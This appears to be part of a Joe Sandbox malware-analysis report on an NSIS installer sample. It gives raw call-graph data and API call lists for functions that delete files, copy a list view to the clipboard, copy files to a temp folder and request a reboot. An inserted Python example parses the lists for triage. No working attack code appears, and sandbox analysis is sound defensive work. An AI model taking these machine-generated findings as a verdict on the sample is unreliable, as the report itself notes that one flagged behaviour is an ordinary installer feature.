3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 
403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle 
GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API 
calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 
                                                (Control-flow graph edge data rendered by the report viewer, omitted. The data continues a function from the preceding record that ends with GetFileAttributesW/CreateFileW, SetFileTime, CloseHandle, lstrcatW and MessageBoxIndirectW, then covers the functions below; only the API calls reachable from each are recoverable.)
                                                • 0040209F: GetDlgItem, GetClientRect, LoadImageW, SendMessageW, DeleteObject
                                                • 00402B9F: ReadFile, MultiByteToWideChar, SetFilePointer, wsprintfW
                                                • 00402B23: GlobalAlloc, WideCharToMultiByte, lstrlenA, WriteFile, GlobalFree
                                                • 004044A5: GetDlgItemTextW, GetDlgItem, GetAsyncKeyState, ShowWindow, SetWindowTextW, IsDlgButtonChecked, SHBrowseForFolderW, CoTaskMemFree, lstrcpynW, SetDlgItemTextW, lstrcmpiW, lstrcatW, GetDiskFreeSpaceW, MulDiv, SendMessageW, KiUserCallbackDispatcher (via 00403D85)
                                                • 00402DA5: SetFilePointer, wsprintfW
                                                • 004030A9: SendMessageW, InvalidateRect
                                                • 00401CB2: internal helpers only (0040145C, 004062A3, 00406C9B)
                                                • 004021B5: ShellExecuteW
                                                • 00402238: WaitForSingleObject, GetExitCodeProcess, CloseHandle, wsprintfW
                                                • 004040B8: WideCharToMultiByte, GlobalAlloc, GetDlgItem, SendMessageW, CheckDlgButton, GetSysColor, lstrlenW, KiUserCallbackDispatcher (via 00403D85)
                                                • 00401EB9: GlobalAlloc, GlobalFree, lstrcpynW
                                                • 004074BB: GlobalAlloc, GlobalFree

                                                Control-flow Graph

                                                (Graph legend: Executed / Not Executed. The rendered edge data is omitted; the function's API calls are listed below.)
                                                Function 004050CD-00405474: sets up the dialog (GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, ShowWindow), starts a worker thread (CreateThread with Function_00005047, then CloseHandle on the thread handle), shows a right-click menu (CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu) and, when the menu item is chosen, copies the list-view rows to the clipboard (SendMessageW with 00001004 = LVM_GETITEMCOUNT and 00001073 = LVM_GETITEMTEXTW, then OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData with 0000000D = CF_UNICODETEXT, CloseClipboard).
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                • CreatePopupMenu.USER32 ref: 00405376
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                • EmptyClipboard.USER32 ref: 00405411
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                • CloseClipboard.USER32 ref: 0040546E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                • String ID: @rD$New install of "%s" to "%s"${
                                                • API String ID: 2110491804-2409696222
                                                • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                Control-flow Graph

                                                (Graph legend: Executed / Not Executed. The rendered edge data is omitted; the function's API calls are listed below.)
                                                Function 00403883-00403C5F, the entry function; the "NSIS Error" and "Error launching installer" strings identify it as the NSIS installer stub. It initialises common controls and COM (#17 = InitCommonControls imported by ordinal, SetErrorMode(00008001) = SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX, OleInitialize), resolves an import at run time (subcall 004062FC: GetModuleHandleA, LoadLibraryA, GetProcAddress), reads the command line (GetCommandLineW, CharNextW; the "/D=", " _?=" and "NCRC" options), chooses a temp directory (GetTempPathW, falling back to GetWindowsDirectoryW + "\Temp"), and on the uninstaller path creates a "~nsu.tmp" directory and copies a file into it (lstrcmpiW, CreateDirectoryW, SetCurrentDirectoryW, DeleteFileW, CopyFileW). A separate branch enables SeShutdownPrivilege on the current process (GetCurrentProcess) and calls ExitWindowsEx(00000002 = EWX_REBOOT). The function ends with CoUninitialize and ExitProcess.
                                                APIs
                                                • #17.COMCTL32 ref: 004038A2
                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                Strings
                                                Memory Dump Source
                                                • Source file and associated dumps: identical to the Memory Dump Source list given for the first function above.
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                • API String ID: 2435955865-239407132
                                                • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
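The two API lists above (the clipboard path of 004050CD and the entry function 00403883) only become useful once the raw argument values are decoded. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's "• API.MODULE(args), ref: address" shape (including the indented "Part of subcall function" lines) into records and derives triage findings from them, decoding the SetClipboardData format argument (0000000D = CF_UNICODETEXT) and the ExitWindowsEx flags (00000002 = EWX_REBOOT). The rule set is the editor's own assumption about what is worth surfacing; the sample input is copied from the lists above.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record into structured
calls and derive triage findings from them.  Added example, not part of the
Joe Sandbox report or of the analysed sample; the decode tables and the
triage rules are the editor's own assumptions."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiCall:
    api: str                  # "SetClipboardData"; "#17" for an import by ordinal
    module: str               # "USER32"
    args: tuple[str, ...]     # argument tokens exactly as the report prints them
    ref: int                  # call-site address (the "ref:" value)
    subcall_of: int | None    # callee address for "Part of subcall function X" lines


# One report line: bullet, optional "Part of subcall function XXXXXXXX:",
# API.MODULE, optional "(args)" (greedy so nested parentheses survive),
# then "ref: XXXXXXXX" with or without a preceding comma.
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_lines(text: str) -> list[ApiCall]:
    """Return every parsable API line in report order; other lines are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        # Arguments are comma separated.  A string argument that itself
        # contains a comma would need a real tokenizer; triage does not.
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def _hex_arg(call: ApiCall, index: int) -> int | None:
    """Argument `index` as an integer, or None when it is '?' or a string."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


# Win32 constants behind the raw values printed in the report.
_CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
_EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
              0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}   # 0 alone is EWX_LOGOFF


def triage(calls: list[ApiCall]) -> list[str]:
    """Findings an analyst reads first, derived from the flat call list."""
    findings: list[str] = []
    for c in calls:
        if c.api == "SetClipboardData":
            fmt = _hex_arg(c, 0)
            findings.append(f"clipboard write at {c.ref:08X}: "
                            f"format {_CLIPBOARD_FORMATS.get(fmt, fmt)}")
        elif c.api == "ExitWindowsEx":
            flags = _hex_arg(c, 0)
            if flags is None:
                decoded = "flags unknown"
            else:
                decoded = "|".join(n for b, n in _EWX_FLAGS.items() if flags & b) or "EWX_LOGOFF"
            findings.append(f"session exit at {c.ref:08X}: {decoded}")
    names = {c.api for c in calls}
    if {"LoadLibraryA", "GetProcAddress"} <= names:
        findings.append("dynamic API resolution (LoadLibraryA + GetProcAddress)")
    if {"GetTempPathW", "CopyFileW"} <= names:
        findings.append("copies a file below the temp directory (GetTempPathW + CopyFileW)")
    if "CreateThread" in names:
        findings.append("starts a worker thread (CreateThread)")
    return findings


# Constructed input: API lines copied from this report's records for
# 004050CD (clipboard path) and 00403883 (entry function).
SAMPLE_REPORT = """\
• OpenClipboard.USER32(00000000), ref: 0040540B
• EmptyClipboard.USER32 ref: 00405411
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
• SetClipboardData.USER32(0000000D,00000000), ref: 00405468
• CloseClipboard.USER32 ref: 0040546E
• #17.COMCTL32 ref: 004038A2
• SetErrorMode.KERNELBASE(00008001), ref: 004038AD
  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
• GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
• CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
"""

if __name__ == "__main__":
    for finding in triage(parse_api_lines(SAMPLE_REPORT)):
        print(finding)
```

Reading the decoded values back against the report: the GlobalAlloc flags 00000042 in the clipboard path are GMEM_MOVEABLE | GMEM_ZEROINIT, the allocation form SetClipboardData requires, and the SendMessageW 00001073 calls that fill that buffer are LVM_GETITEMTEXTW on the installer's own list view. The "Contains functionality to modify clipboard data" signature is therefore satisfied by an installer details-to-clipboard feature here, which is the kind of context a raw API-name match cannot give and the reason the triage rules print the decoded argument rather than only the API name.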

                                                Control-flow Graph

                                                (Graph legend: Executed / Not Executed. The rendered edge data is omitted.)
                                                Function 004074BB-00407CF6: a large internal routine whose only API calls are GlobalAlloc and GlobalFree; the report associates no strings or API IDs with it.
                                                Memory Dump Source
                                                • Source file and associated dumps: identical to the Memory Dump Source list given for the first function above.
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                APIs
                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                 Control-flow Graph
                                                 • Graph image not reproduced in text: function at 00405479 (legend: Executed / Not Executed)
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                • ShowWindow.USER32(?), ref: 004054D2
                                                • DestroyWindow.USER32 ref: 004054E6
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: @rD
                                                • API String ID: 3282139019-3814967855
                                                • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                 Control-flow Graph
                                                 • Graph image not reproduced in text: function at 004015A0 (legend: Executed / Not Executed)
                                                APIs
                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                • SetForegroundWindow.USER32(?), ref: 004016CB
